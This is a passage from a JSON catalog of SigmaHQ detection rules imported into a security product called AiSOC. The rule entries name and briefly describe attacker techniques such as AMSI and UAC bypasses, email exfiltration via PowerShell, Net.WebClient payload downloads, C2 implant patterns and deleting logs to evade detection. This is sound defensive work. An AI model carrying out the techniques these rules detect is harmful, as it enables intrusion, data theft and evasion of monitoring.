"sigmahq-sigma-300bac00-e041-4ee2-9c36-e262656a6ecc", "type": "detection", "name": "Active Directory User Backdoors", "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/active-directory-user-backdoors.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "300bac00-e041-4ee2-9c36-e262656a6ecc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_alert_ad_user_backdoors.yml" } }, { "id": "sigmahq-sigma-3037d961-21e9-4732-b27a-637bcc7bf539", "type": "detection", "name": "Suspicious High IntegrityLevel Conhost Legacy Option", "description": "ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-high-integritylevel-conhost-legacy-option.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3037d961-21e9-4732-b27a-637bcc7bf539", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_conhost_legacy_option.yml" } }, { "id": "sigmahq-sigma-304810ed-8853-437f-9e36-c4975c3dfd7e", "type": "detection", "name": "HackTool - BabyShark Agent Default URL Pattern", "description": "Detects Baby Shark C2 Framework default communication patterns", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-babyshark-agent-default-url-pattern.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "304810ed-8853-437f-9e36-c4975c3dfd7e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_hktl_baby_shark_default_agent_url.yml" } }, { "id": "sigmahq-sigma-304afd73-55a5-4bb9-8c21-0b1fc84ea9e4", "type": "detection", "name": "PSEXEC Remote Execution File Artefact", "description": "Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1136.002", "T1543.003", "T1570" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/psexec-remote-execution-file-artefact.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "304afd73-55a5-4bb9-8c21-0b1fc84ea9e4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_sysinternals_psexec_service_key.yml" } }, { "id": "sigmahq-sigma-30a8cb77-8eb3-4cfb-8e79-ad457c5a4592", "type": "detection", "name": "Renamed Powershell Under Powershell Channel", "description": "Detects a renamed Powershell execution, which is a common technique used to circumvent security controls and bypass detection logic that's dependent on process names and process paths.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-powershell-under-powershell-channel.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "30a8cb77-8eb3-4cfb-8e79-ad457c5a4592", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_classic/posh_pc_renamed_powershell.yml" } }, { "id": "sigmahq-sigma-30aed7b6-d2c1-4eaf-9382-b6bc43e50c57", "type": "detection", "name": "File Deletion", "description": "Detects file deletion using \"rm\", \"shred\" or \"unlink\" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1070.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/file-deletion.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "30aed7b6-d2c1-4eaf-9382-b6bc43e50c57", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_file_deletion.yml" } }, { "id": "sigmahq-sigma-30bcce26-51c5-49f2-99c8-7b59e3af36c7", "type": "detection", "name": "Execution Of Script Located In Potentially Suspicious Directory", "description": "Detects executions of scripts located in potentially suspicious locations such as \"/tmp\" via a shell such as \"bash\", \"sh\", etc.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/execution-of-script-located-in-potentially-suspicious-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "30bcce26-51c5-49f2-99c8-7b59e3af36c7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_susp_shell_script_exec_from_susp_location.yml" } }, { "id": "sigmahq-sigma-30bf1789-379d-4fdc-900f-55cd0a90a801", "type": "detection", "name": "Visual Studio Code Tunnel Service Installation", "description": "Detects the installation of VsCode tunnel (code-tunnel) as a service.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/visual-studio-code-tunnel-service-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "30bf1789-379d-4fdc-900f-55cd0a90a801", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_vscode_tunnel_service_install.yml" } }, { "id": "sigmahq-sigma-30d07da2-83ab-45d8-ae75-ec7c0edcaffc", "type": "detection", "name": "Renamed BOINC Client Execution", "description": "Detects the execution of a renamed BOINC binary.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1553" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-boinc-client-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "30d07da2-83ab-45d8-ae75-ec7c0edcaffc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_boinc.yml" } }, { "id": "sigmahq-sigma-30e92f50-bb5a-4884-98b5-d20aa80f3d7a", "type": "detection", "name": "Hidden Powershell in Link File Pattern", "description": "Detects events that appear when a user click on a link file with a powershell command in it", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hidden-powershell-in-link-file-pattern.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "30e92f50-bb5a-4884-98b5-d20aa80f3d7a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_embed_exe_lnk.yml" } }, { "id": "sigmahq-sigma-30edb182-aa75-42c0-b0a9-e998bb29067c", "type": "detection", "name": "Potential AMSI Bypass Via .NET Reflection", "description": "Detects Request to \"amsiInitFailed\" that can be used to disable AMSI Scanning", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-amsi-bypass-via-net-reflection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "30edb182-aa75-42c0-b0a9-e998bb29067c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_amsi_init_failed_bypass.yml" } }, { "id": "sigmahq-sigma-30fc8de7-d833-40c4-96b6-28319fbc4f6c", "type": "detection", "name": "UAC Bypass Using Event Viewer RecentViews", "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-event-viewer-recentviews.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr_recentviews.yml" } }, { "id": "sigmahq-sigma-3109530e-ab47-4cc6-a953-cac5ebcc93ae", "type": "detection", "name": "ADS Zone.Identifier Deleted By Uncommon Application", "description": "Detects the deletion of the \"Zone.Identifier\" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ads-zone-identifier-deleted-by-uncommon-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3109530e-ab47-4cc6-a953-cac5ebcc93ae", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_delete/file_delete_win_zone_identifier_ads_uncommon.yml" } }, { "id": "sigmahq-sigma-311b6ce2-7890-4383-a8c2-663a9f6b43cd", "type": "detection", "name": "Enabled User Right in AD to Control User Objects", "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/enabled-user-right-in-ad-to-control-user-objects.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_alert_active_directory_user_control.yml" } }, { "id": "sigmahq-sigma-312b42b1-bded-4441-8b58-163a3af58775", "type": "detection", "name": "Potentially Suspicious Execution From Tmp Folder", "description": "Detects a potentially suspicious execution of a process located in the '/tmp/' folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-execution-from-tmp-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "312b42b1-bded-4441-8b58-163a3af58775", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_susp_execution_tmp_folder.yml" } }, { "id": "sigmahq-sigma-312d0384-401c-4b8b-abdf-685ffba9a332", "type": "detection", "name": "Email Exifiltration Via Powershell", "description": "Detects email exfiltration via powershell cmdlets", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/email-exifiltration-via-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "312d0384-401c-4b8b-abdf-685ffba9a332", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_email_exfil.yml" } }, { "id": "sigmahq-sigma-3132570d-cab2-4561-9ea6-1743644b2290", "type": "detection", "name": "Kubernetes Events Deleted", "description": "Detects when events are deleted in Kubernetes.\nAn adversary may delete Kubernetes events in an attempt to evade detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/kubernetes-events-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3132570d-cab2-4561-9ea6-1743644b2290", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/kubernetes/audit/kubernetes_audit_events_deleted.yml" } }, { "id": "sigmahq-sigma-313d6012-51a0-4d93-8dfc-de8553239e25", "type": "detection", "name": "Install New Package Via Winget Local Manifest", "description": "Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them.\nThe manifest option enables you to install an application by passing in a YAML file directly to the client.\nWinget can be used to download and install exe, msi or msix files later.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/install-new-package-via-winget-local-manifest.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "313d6012-51a0-4d93-8dfc-de8553239e25", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_winget_local_install_via_manifest.yml" } }, { "id": "sigmahq-sigma-313fbb0a-a341-4682-848d-6d6f8c4fab7c", "type": "detection", "name": "Suspicious PowerShell WindowStyle Option", "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-powershell-windowstyle-option.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "313fbb0a-a341-4682-848d-6d6f8c4fab7c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_windowstyle.yml" } }, { "id": "sigmahq-sigma-31545105-3444-4584-bebf-c466353230d2", "type": "detection", "name": "Touch Suspicious Service File", "description": "Detects usage of the \"touch\" process in service file.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/touch-suspicious-service-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "31545105-3444-4584-bebf-c466353230d2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_touch_susp.yml" } }, { "id": "sigmahq-sigma-318557a5-150c-4c8d-b70e-a9910e199857", "type": "detection", "name": "File Creation In Suspicious Directory By Msdt.EXE", "description": "Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-creation-in-suspicious-directory-by-msdt-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "318557a5-150c-4c8d-b70e-a9910e199857", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_msdt_susp_directories.yml" } }, { "id": "sigmahq-sigma-31c51af6-e7aa-4da7-84d4-8f32cc580af2", "type": "detection", "name": "Sliver C2 Default Service Installation", "description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543.003", "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sliver-c2-default-service-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_sliver.yml" } }, { "id": "sigmahq-sigma-31d68132-4038-47c7-8f8e-635a39a7c174", "type": "detection", "name": "Potential Active Directory Reconnaissance/Enumeration Via LDAP", "description": "Detects potential Active Directory enumeration via LDAP", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.002", "T1087.002", "T1482" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-active-directory-reconnaissance-enumeration-via-ldap.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "31d68132-4038-47c7-8f8e-635a39a7c174", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/ldap/win_ldap_recon.yml" } }, { "id": "sigmahq-sigma-31e124fb-5dc4-42a0-83b3-44a69c77b271", "type": "detection", "name": "Antivirus Filter Driver Disallowed On Dev Drive - Registry", "description": "Detects activity that indicates a user disabling the ability for Antivirus mini filter to inspect a \"Dev Drive\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/antivirus-filter-driver-disallowed-on-dev-drive-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "31e124fb-5dc4-42a0-83b3-44a69c77b271", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_devdrv_disallow_antivirus_filter.yml" } }, { "id": "sigmahq-sigma-320fccbf-5e32-4101-82b8-2679c5f007c6", "type": "detection", "name": "CodeIntegrity - Revoked Kernel Driver Loaded", "description": "Detects the load of a revoked kernel driver", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/codeintegrity-revoked-kernel-driver-loaded.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "320fccbf-5e32-4101-82b8-2679c5f007c6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/code_integrity/win_codeintegrity_revoked_driver_loaded.yml" } }, { "id": "sigmahq-sigma-3215aa19-f060-4332-86d5-5602511f3ca8", "type": "detection", "name": "Suspicious LNK Double Extension File Created", "description": "Detects the creation of files with an \"LNK\" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the \"LNK\" extension by default.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-lnk-double-extension-file-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3215aa19-f060-4332-86d5-5602511f3ca8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml" } }, { "id": "sigmahq-sigma-322ed9ec-fcab-4f67-9a34-e7c6aef43614", "type": "detection", "name": "New Port Forwarding Rule Added Via Netsh.EXE", "description": "Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1090" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-port-forwarding-rule-added-via-netsh-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "322ed9ec-fcab-4f67-9a34-e7c6aef43614", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_netsh_port_forwarding.yml" } }, { "id": "sigmahq-sigma-3236fcd0-b7e3-4433-b4f8-86ad61a9af2d", "type": "detection", "name": "PowerShell Download Via Net.WebClient - PowerShell Classic", "description": "Detects PowerShell download activity, via the .DownloadFile() or .DownloadString() methods of the Net.WebClient class.\nThis technique is often abused by attackers to download additional payloads.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-download-via-net-webclient-powershell-classic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3236fcd0-b7e3-4433-b4f8-86ad61a9af2d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_classic/posh_pc_download_via_webclient.yml" } }, { "id": "sigmahq-sigma-323ff3f5-0013-4847-bbd4-250b5edb62cc", "type": "detection", "name": "Modify System Firewall", "description": "Detects the removal of system firewall rules. Adversaries may only delete or modify a specific system firewall rule to bypass controls limiting network usage or access.\nDetection rules that match only on the disabling of firewalls will miss this.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1686" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/modify-system-firewall.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "323ff3f5-0013-4847-bbd4-250b5edb62cc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_modify_system_firewall.yml" } }, { "id": "sigmahq-sigma-32410e29-5f94-4568-b6a3-d91a8adad863", "type": "detection", "name": "PUA - Fast Reverse Proxy (FRP) Execution", "description": "Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1090" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-fast-reverse-proxy-frp-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "32410e29-5f94-4568-b6a3-d91a8adad863", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_frp.yml" } }, { "id": "sigmahq-sigma-32438676-1dba-4ac7-bf69-b86cba995e05", "type": "detection", "name": "GCP Access Policy Deleted", "description": "Detects when an access policy that is applied to a GCP cloud resource is deleted.\nAn adversary would be able to remove access policies to gain access to a GCP cloud resource.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/gcp-access-policy-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "32438676-1dba-4ac7-bf69-b86cba995e05", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 